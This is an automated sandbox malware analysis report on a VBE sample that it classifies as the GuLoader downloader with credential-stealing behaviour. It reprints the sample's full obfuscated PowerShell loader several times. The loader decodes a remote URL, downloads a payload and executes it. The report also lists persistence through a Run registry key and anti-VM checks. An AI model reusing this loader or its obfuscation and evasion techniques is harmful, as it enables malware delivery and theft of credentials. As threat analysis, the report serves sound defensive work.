Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inquiry Studbolt - 240703.vbe

Overview

General Information

Sample name:Inquiry Studbolt - 240703.vbe
Analysis ID:1466653
MD5:cac00b561578ffb0e2b2b2fd96eec0cd
SHA1:16ffdf688abd43ccfaa46f24709ade48af5534e7
SHA256:8876ad4754fb4f61ba5489924603d279dc023f68c1ba847020107a376de9a9ad
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • wscript.exe (PID: 9044 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 2680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD AiSpsR s KeHer .s u]Ud=Be$P,SIncAtlAuaHefI f FsCo ');$Omkranses=Immatrikulationens 'Be$AfKGeoK,nB.sKoe ,k,ov He.lnDit eCosOv. uDDio.awTan .l Lo SaD dV F ,iExl,me C(Te$H,RBreKndSneJesPiiTigFunS,aVit Si ,nCugFa,Ma$ Vp iRetM.iyeaNolSa)Ka ';$Vitial=$Chaconners172[0];Influerende (Immatrikulationens 'Au$ ,gSelDioClbInaEnlRe:OvSTyk.trGruI pElfO o rS ePala sKnkBrefytL,=Un(suTAfeTusS,t S-MeP paA t.oh U A,$FeV aiHetAmiPaa alKe)H ');while (!$Skrupforelsket) {Influerende (Immatrikulationens 'N.$ gCrl ,o yb naEylHe:M BRee Cfs.e rEjnO.eO.dBa= P$EntMarBausyeKn ') ;Influerende $Omkranses;Influerende (Immatrikulationens 'D S ,tTaastr gtDa-hySSklLee SeKupT. .u4Un ');Influerende (Immatrikulationens 'Ch$U.gRelhaoR b aR lre:AfSUnkKur BuW,pKrfEro SrA ePrl .sOgkP,eGetA =Te(MiTnoeGis rt T- SP abetGah a Su$.aVPuiUntBaig aSllUn)Sw ') ;Influerende (Immatrikulationens 'Re$IngPolFiostb ,aKalMe:,rPS a.nlK,aPetMoaGnltoiE.s,ye ,=Pl$D gBals.oAnbSpaSllSp:meKT oS.mT.eTad aiK aO,n Ut reS.rT.1 0Gy4 a+Wi+Ne%Sa$S HHayAmgUniTreMaj.an.weA,kTeo .m PmNos,ei AoPlnMyeFinResSk.V cMaoDuuMenGit.o ') ;$Redesignating=$Hygiejnekommsionens[$Palatalise];}$Pushmina119=294060;$Faseforvrngning=27039;Influerende (Immatrikulationens ' h$R,gAdlU.oSob a HlFl: .DGri .sLacPoo .pP.h ei Cl,cefl Di=Pr .GYveBot,t-K,CS,o fnG.t Ge YnThtNi .i$KlV aiT,ts,i,aaOrl U ');Influerende (Immatrikulationens ' N$Deg TlStoBrb a,elOu: JJBaoprv.pi Ma lB iUnt TyFl Be=Br E.[UtSP y As,at ,e,pmAf. AC.uo FnP v SeB rAgtG ]Mi:S :UnFSlrepo.emRuB.paJ.sOdeU 6.e4BrSWitTir ei Ln mg,o(Th$BeDEni .sN,cAno.cpSkhvaiKol Be R).a ');Influerende (Immatrikulationens 'Ta$ CgmulP oInbCoaOdlSt:SuRTye fS,rP,a cBrtAnis,nIngUn Th=.n fr[OvSGay,ysBetOue em.a.,eT,neSexAnt K.,vE .naucEkoBedsoi Kn,sgAs]M,:Ve:biAS,SBaCCaIP,IMu.SuG me AtSeSU t Cr.eiR nL g.u( D$InJBro .vB.iC.ae.l ,iApt ,yAf)Le ');Influerende (Immatrikulationens ' k$Fog .l Eo cbK aC lEn: PEFnfQufGuelacmutCieTrdMe= .$ oR eHef .rAka c Ct,ei onAmg,f. lsApu Ob sPltD r .i onEbg ,( W$BlP nuFesBihBemU.i Fn AaSa1 e1,p9 F,Sp$SoFSaa SsR,eDof,noUdr bvSnr snBigAan,di,onL.gLe)De ');Influerende $Effected;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 320 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6840 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD AiSpsR s KeHer .s u]Ud=Be$P,SIncAtlAuaHefI f FsCo ');$Omkranses=Immatrikulationens 'Be$AfKGeoK,nB.sKoe ,k,ov He.lnDit eCosOv. uDDio.awTan .l Lo SaD dV F ,iExl,me C(Te$H,RBreKndSneJesPiiTigFunS,aVit Si ,nCugFa,Ma$ Vp iRetM.iyeaNolSa)Ka ';$Vitial=$Chaconners172[0];Influerende (Immatrikulationens 'Au$ ,gSelDioClbInaEnlRe:OvSTyk.trGruI pElfO o rS ePala sKnkBrefytL,=Un(suTAfeTusS,t S-MeP paA t.oh U A,$FeV aiHetAmiPaa alKe)H ');while (!$Skrupforelsket) {Influerende (Immatrikulationens 'N.$ gCrl ,o yb naEylHe:M BRee Cfs.e rEjnO.eO.dBa= P$EntMarBausyeKn ') ;Influerende $Omkranses;Influerende (Immatrikulationens 'D S ,tTaastr gtDa-hySSklLee SeKupT. .u4Un ');Influerende (Immatrikulationens 'Ch$U.gRelhaoR b aR lre:AfSUnkKur BuW,pKrfEro SrA ePrl .sOgkP,eGetA =Te(MiTnoeGis rt T- SP abetGah a Su$.aVPuiUntBaig aSllUn)Sw ') ;Influerende (Immatrikulationens 'Re$IngPolFiostb ,aKalMe:,rPS a.nlK,aPetMoaGnltoiE.s,ye ,=Pl$D gBals.oAnbSpaSllSp:meKT oS.mT.eTad aiK aO,n Ut reS.rT.1 0Gy4 a+Wi+Ne%Sa$S HHayAmgUniTreMaj.an.weA,kTeo .m PmNos,ei AoPlnMyeFinResSk.V cMaoDuuMenGit.o ') ;$Redesignating=$Hygiejnekommsionens[$Palatalise];}$Pushmina119=294060;$Faseforvrngning=27039;Influerende (Immatrikulationens ' h$R,gAdlU.oSob a HlFl: .DGri .sLacPoo .pP.h ei Cl,cefl Di=Pr .GYveBot,t-K,CS,o fnG.t Ge YnThtNi .i$KlV aiT,ts,i,aaOrl U ');Influerende (Immatrikulationens ' N$Deg TlStoBrb a,elOu: JJBaoprv.pi Ma lB iUnt TyFl Be=Br E.[UtSP y As,at ,e,pmAf. AC.uo FnP v SeB rAgtG ]Mi:S :UnFSlrepo.emRuB.paJ.sOdeU 6.e4BrSWitTir ei Ln mg,o(Th$BeDEni .sN,cAno.cpSkhvaiKol Be R).a ');Influerende (Immatrikulationens 'Ta$ CgmulP oInbCoaOdlSt:SuRTye fS,rP,a cBrtAnis,nIngUn Th=.n fr[OvSGay,ysBetOue em.a.,eT,neSexAnt K.,vE .naucEkoBedsoi Kn,sgAs]M,:Ve:biAS,SBaCCaIP,IMu.SuG me AtSeSU t Cr.eiR nL g.u( D$InJBro .vB.iC.ae.l ,iApt ,yAf)Le ');Influerende (Immatrikulationens ' k$Fog .l Eo cbK aC lEn: PEFnfQufGuelacmutCieTrdMe= .$ oR eHef .rAka c Ct,ei onAmg,f. lsApu Ob sPltD r .i onEbg ,( W$BlP nuFesBihBemU.i Fn AaSa1 e1,p9 F,Sp$SoFSaa SsR,eDof,noUdr bvSnr snBigAan,di,onL.gLe)De ');Influerende $Effected;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7912 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 9032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • GrOcCQC.exe (PID: 4764 cmdline: "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6136 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • GrOcCQC.exe (PID: 2516 cmdline: "C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000D.00000002.878918969194.0000000008A70000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000F.00000002.882856308898.0000000020C85000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000D.00000002.878919425134.0000000008CCF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: powershell.exe PID: 2680JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 2680INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x31915c:$b2: ::FromBase64String(
          • 0x41729:$s1: -join
          • 0x41c45:$s1: -join
          • 0x54ccd:$s1: -join
          • 0x54d07:$s1: -join
          • 0x54df6:$s1: -join
          • 0x54fa7:$s1: -join
          • 0x54fc9:$s1: -join
          • 0x5527e:$s1: -join
          • 0x5529e:$s1: -join
          • 0x552d0:$s1: -join
          • 0x55318:$s1: -join
          • 0x55345:$s1: -join
          • 0x5536c:$s1: -join
          • 0x55396:$s1: -join
          • 0x553fb:$s1: -join
          • 0x558a7:$s1: -join
          • 0x558c8:$s1: -join
          • 0x55916:$s1: -join
          • 0x5593f:$s1: -join
          • 0x5596e:$s1: -join
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_2680.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_6840.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xdd2c:$b2: ::FromBase64String(
            • 0xcdb0:$s1: -join
            • 0x655c:$s4: +=
            • 0x661e:$s4: +=
            • 0xa845:$s4: +=
            • 0xc962:$s4: +=
            • 0xcc4c:$s4: +=
            • 0xcd92:$s4: +=
            • 0x16060:$s4: +=
            • 0x160e0:$s4: +=
            • 0x161a6:$s4: +=
            • 0x16226:$s4: +=
            • 0x163fc:$s4: +=
            • 0x16480:$s4: +=
            • 0xd5d7:$e4: Get-WmiObject
            • 0xd7c6:$e4: Get-Process
            • 0xd81e:$e4: Start-Process
            • 0x16cd8:$e4: Get-Process

            System Summary

            barindex
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe", CommandLine|base64offset|contains: Jnm, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2692, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe", ProcessId: 9044, ProcessName: wscript.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 9032, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GrOcCQC
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe", CommandLine|base64offset|contains: Jnm, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2692, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe", ProcessId: 9044, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD AiSpsR s KeHer
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
            Source: http://pesterbdd.com/images/Pester.pnghVirustotal: Detection: 12%Perma Link
            Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 9%Perma Link
            Source: unknownHTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49949 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49950 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49951 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49952 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.878914102008.0000000007121000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdb; source: powershell.exe, 0000000D.00000002.878917749751.0000000008791000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdbGCTL source: GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr
            Source: Binary string: wab.pdb source: GrOcCQC.exe, GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
